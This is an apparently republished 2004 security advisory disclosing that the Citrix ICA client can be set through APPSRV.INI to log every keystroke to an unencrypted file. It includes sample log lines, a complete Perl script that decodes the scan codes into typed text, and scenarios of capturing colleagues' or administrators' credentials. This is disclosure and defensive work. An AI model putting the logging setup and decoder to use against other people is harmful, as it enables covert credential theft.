|
Brought to you by:
Suppliers of:
|
|
|
| |
| The Citrix ICA client has a standard Keyboard Logger functionality which can be activated by a check box in CPN (Citrix Program neighborhood) or by editing the file APPSRV.INI by hand. This application file and concerning log files are stored by default in the user profile directory. The default location where these files are first created is '\Document and Settings\%username%\Application Data\ICAClient\'. With the default installation of Microsoft Windows 2000/XP the user has full control (NTFS) in his own profile directory on his/her workstation. Therefore an ordinary user can edit his own APPSRV.INI. |
| |
Credit:
The information has been provided by Andre van der Lingen and Robert-Jan Mora.
The original article can be found at: http://www.hoffmannbv.nl/forensisch/nieuws/citrixkeyboardlogger.html
|
| |
Systems Affected:
* MetaFrame Presentation Server Client (Versions 8.0 and earlier)
* ICA Win32 Program Neighborhood Client (Citrix Program Neighbourhood) 7.0 and 8.0
* Citrix Webclient version 7.0 and 8.0
Comments by Citrix on the APPSRV.INI
From the Citrix Knowledge Base
Document ID: CTX331178
See the following URL for the Citrix Knowledge base article: http://hqextsrvsft01.citrix.com/kb/entry!default.jspa?categoryID=149&entryID=850&fromSearchPage=true.
LogKeyboard=Off
Logs keyboard data. Values are On or Off. It will log an event whenever you press a key on the keyboard or move the mouse. This is primarily intended for technical support purposes.
LogAppend=Off
The event log can be overwritten by new events or new events can be added to the end of the existing file. Specify On to save old events and add new events to the end of the file. Specify Off to overwrite old events.
SSOnUserSetting=On
Select (on) or clears (off) pass-through authentication
With the default installation of the Citrix ICA client these functions are NOT enabled. But when the parameter LogKeyboard=On is enabled the Ica client logs the keyboard scan code for every pressed key into the WFCWIN32.LOG file during the Citrix Terminal Server user session. This log file is NOT encrypted or secured in any way. With a simple translation of the logfile it's possible to replay all the keyboard strokes during that Citrix Terminal Server session.
All secondary sign ons (user credentials validations) or all other forms of authentication and information by keyboard are compromised.
Technical Description:
When the Citrix Keyboard log function is activated, all the keyboard scancodes are logged in the file WFCWIN32.LOG. After using the Citrix ICA client to use Citrix Published applications all the keyboard strokes are logged in this log file. Some example output:
09-11-2004 10:19:19:250 Remote Administrator viewer: KEYBOARD: scan (2E)
09-11-2004 10:19:19:250 Remote Administrator viewer: KEYBOARD: scan (17)
09-11-2004 10:19:36:750 Remote Administrator viewer: KEYBOARD: scan (14)
09-11-2004 10:19:36:843 Remote Administrator viewer: KEYBOARD: scan (13)
09-11-2004 10:19:36:859 Remote Administrator viewer: KEYBOARD: scan (17)
09-11-2004 10:19:36:937 Remote Administrator viewer: KEYBOARD: scan (2D).
Documents for translation of these keyboard scan codes are widely available on the Internet. By translating these keyboard scan codes you are able to replay the exact keyboard strokes off the user using the Citrix ICA client to logon to his e-mail applications, financial applications documents and so on. All pressed keyboard keys are captured by this log file.
With the following Perl program it is very easy to translate the WFCWIN32.LOG file containing the keyboard scan codes to replay the keyboard strokes of the user during the used Citrix Terminal Server user session.
Code snippit:
# Version: 1.0
# Date: 09 september 2004
# Description: Program to translate Citrix Keyboard scan codes to output replay of keyboard strokes
# The original WFCWIN32.LOG file can be used as a parameter of this perl script
# Credits: Andre van der Lingen - System Engineer Interpay Nederland B.V.
# Robert-Jan Mora - Forensic Investigator Hoffmann Investigations
# Best performance in Perl 5.6.1 due to Time::HiRes module issues in 5.8
# Modules
use Time::HiRes qw(usleep);
####################################### Main
################################
# Read Associative Array
&read_array;
$FILE = @ARGV[0];
if (@ARGV[0] eq "") {
print "Give log file as parameter"
}
# Open the Citrix log file from the parameter
&open_file;
# Process and translate the log file
foreach $scancode (@ALL) {
chomp $scancode;
$scancode=~s/^.*\(//;
$scancode=~s/\)//;
#print $scancode;
if ($scancode eq "36" or $scancode eq "2A") {
$shift_key = 1;
next;
} else {
&print_ouput;
}
}
####################################### Subs
################################
#Not scanning for release scancodes.
sub print_ouput {
usleep 100000;
$table_value = "$table{\"$scancode\"}";
if ($shift_key) {
$table_value =~ s/^.//;
} else {
$table_value =~ s/.$//;
}
print ("$table_value");
$shift_key = 0;
}
sub open_file {
if ( -e $FILE) {
open (F, $FILE) || die "Could not find file name $FILE" ;
@ALL = <F> ;
#print "\n@ALL\n\n" unless ($NODEBUG) ;
close F ;
}
}
sub read_array {
%table = ("1E","aA",
"30","bB",
"2E","cC",
"20","dD",
"12","eE",
"21","fF",
"22","gG",
"23","hH",
"17","iI",
"24","jJ",
"25","kK",
"26","lL",
"32","mM",
"31","nN",
"18","oO",
"19","pP",
"10","qQ",
"13","rR",
"1F","sS",
"14","tT",
"16","uU",
"2F","vV",
"11","wW",
"2D","xX",
"15","yY",
"2C","zZ",
"02","1!",
"03","2@",
"04","3#",
"05","4\$",
"06","5%",
"07","6^",
"08","7&",
"09","8*",
"0A","9(",
"0B","0)",
"39"," ", #Two spaces
"1C","\n\n",
"0F","\t\t",
"0E","\b\b",
"0C","-_",
"0D","=+",
"1A","\[\{",
"1B","\]\}",
"2B","\\|",
"27",";:",
"28","\'\"",
"29","\`~",
"33",",<",
"34",".>",
"35","\/?",
"36"," -RightShift- ",
"2A"," -LeftShift- ");
}
Risks:
Malicious User
It is possible for a user to edit the APPSRV.INI and edit all the values concerning logging, encryption, single sign on etc.. With the single sign on option turned off it is possible to capture the first initial logon to the Citrix Terminal Server session. This logs the username password credentials perfectly in the Citrix logfile of the current user on the workstation. There are several scenarios possible that a malicious user could ask another colleague, or worse, an system administrator to use his/her workstation to start and use Citrix Published Applications. This is possible via the console and also with a remote desktop application like Remote Administrator. The keyboard strokes are logged when that colleague or the system administrator logs on with his credentials by activating Citrix Published Applications.
Credentials regarding E-mail logins, financial application logins, password protected documents and privacy info etc. are captured during these Citrix Terminal Server sessions.
Virus/Trojan/Worms
Another risk could be a virus/trojan or worm that enables these parameters in the APPSRV.INI and gathers the WFCWIN32.LOG files. There are a lot of home workers that log on to the corporate network from their home pc.
Protection:
A new ICA client with no keyboard logging functionality or encryption of this WFCWIN32.log file.
Patch/New Client:
After reporting Citrix about this security flaw, they made a new ICA client without the keyboard logging functionality(version 8.1). See the following URL for the new client: http://support.citrix.com/hotfixes.jsp. Only for troubleshooting purposes Citrix has build an debug version of the ICA client. Before applying the patch we advise every (large) organization that uses the Citrix ICA client to check for these modified settings in the APPSRV.INI's on their network as mentioned earlier in Overview. There is always the possibility that this security flaw has been used in the wild for a long time without being noticed but has never been reported. Or you can ask Hoffmann Forensic Services to assist you in checking your network in an automated way. If these altered APPSRV.INI's are discovered on your network contact us at alerts@hoffmannbv.nl for taking the proper actions.
Research:
Further research has to be done on the ICA-client on different platforms. We tested on Windows 2000/Windows XP. There are a lot of options that can be a security risk at your network. See the Citrix KB description on the APPSRV.INI: Document ID: CTX331178.
Comments:
The authors of this advisory were flabbergasted that a keylogger functionality is implemented and available with the ICA-client to ordinary users. For a long time malicious users have had the opportunity to misuse your systems, either directly or by Trojans.
Citrix Security Bulletin:
Citrix have published their own security bulletin. The bulletin can be found at the following location: http://support.citrix.com/kb/entry.jspa?externalID=CTX105215
Vendor response:
See vendor response at the following URL: http://support.citrix.com/kb/entry.jspa?entryID=5536&categoryID=149
|
|
|
|
|
